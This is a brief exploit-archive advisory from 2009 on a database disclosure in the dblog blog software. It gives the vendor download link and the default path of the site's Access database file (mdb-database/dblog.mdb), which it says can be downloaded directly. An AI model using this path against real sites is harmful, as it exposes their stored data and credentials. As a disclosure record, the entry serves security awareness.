id: 10315
date: 12/17/2009
title: dblog (dblog.mdb) Remote Database Disclosure Vulnerability
author: AnTi SeCuRe
cves: 

==========================================================
dblog (dblog.mdb) Remote Database Disclosure Vulnerability
==========================================================

---------------------------------------
dblog (dblog.mdb) Remote Database Disclosure Vulnerability
---------------------------------------
 
#####################################################
# [+] Author : AnTi SeCuRe #
# [+] Team : SauDi ViRuS TeaM #
# [+] Script : dblog #
#####################################################
 
 
 
 
[+] download : http://www.dblog.it/sito/download.asp
 
 
 
vuln. in :
 
http://localhost/path/mdb-database/dblog.mdb
 
 
Thanks to : Allah ..



#  0day.today [2023-03-24]  #